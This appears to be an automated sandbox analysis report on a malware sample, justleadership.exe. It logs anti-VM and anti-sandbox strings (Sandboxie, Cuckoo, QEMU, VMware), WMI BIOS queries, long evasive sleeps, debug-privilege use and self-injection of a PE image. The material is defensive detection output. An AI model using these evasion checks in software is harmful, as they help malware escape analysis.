Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 6640, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL@\KQ
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE@\KQ
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EXPLORERJSBIEDLL.DLLKCUCKOOMON.DLLLWIN32_PROCESS.HANDLE='{0}'MPARENTPROCESSIDNCMDOSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREPVERSIONQSERIALNUMBERSVMWARE|VIRTUAL|A M I|XENTSELECT * FROM WIN32_COMPUTERSYSTEMUMANUFACTURERVMODELWMICROSOFT|VMWARE|VIRTUALXJOHNYANNAZXXXXXXXX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 1690000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 30A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 1690000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 18A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 3230000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 5230000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\justleadership.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\justleadership.exe TID: 6676 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe TID: 6676 Thread sleep time: -38961s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe TID: 4460 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\justleadership.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\justleadership.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\justleadership.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware\V
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLRkq
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen@\kq
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $kq 1:en-CH:VMware|VIRTUAL|A M I|Xen
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HXHDX OMPBA5H7CP@\kq0VMware|VIRTUAL|A M<,t
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWareLRkqD
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $kq 1:en-CH:Microsoft|VMWare|Virtual
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: explorerJSbieDll.dllKcuckoomon.dllLwin32_process.handle='{0}'MParentProcessIdNcmdOselect * from Win32_BIOS8Unexpected WMI query failurePversionQSerialNumberSVMware|VIRTUAL|A M I|XenTselect * from Win32_ComputerSystemUmanufacturerVmodelWMicrosoft|VMWare|VirtualXjohnYannaZxxxxxxxx
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen(_kq
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe@\kq
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 7lPk2bnBC8GWF8b TdZa51Ph@\kq0Microsoft|VMWare|V<
Source: justleadership.exe, 00000000.00000002.2119536181.0000000001445000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\justleadership.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\justleadership.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\justleadership.exe Memory written: C:\Users\user\Desktop\justleadership.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Users\user\Desktop\justleadership.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Users\user\Desktop\justleadership.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\modern.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\roman.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\script.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
